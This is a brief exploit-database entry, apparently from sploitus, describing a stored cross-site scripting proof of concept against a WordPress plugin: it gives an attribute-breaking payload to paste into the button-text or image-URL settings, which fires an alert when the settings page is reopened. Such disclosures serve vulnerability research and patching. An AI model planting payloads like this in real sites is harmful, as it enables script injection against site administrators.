Share
## https://sploitus.com/exploit?id=WPEX-ID:1C551234-9C59-41A0-AB74-BEEA2D27DF6B
Put the following payload in the "Text for the button" or "URL of a custom "Top of Page" image" settings of the plugin and save: "autofocus onfocus=alert(/XSS/)//

The XSS will be triggered when accessing the settings page again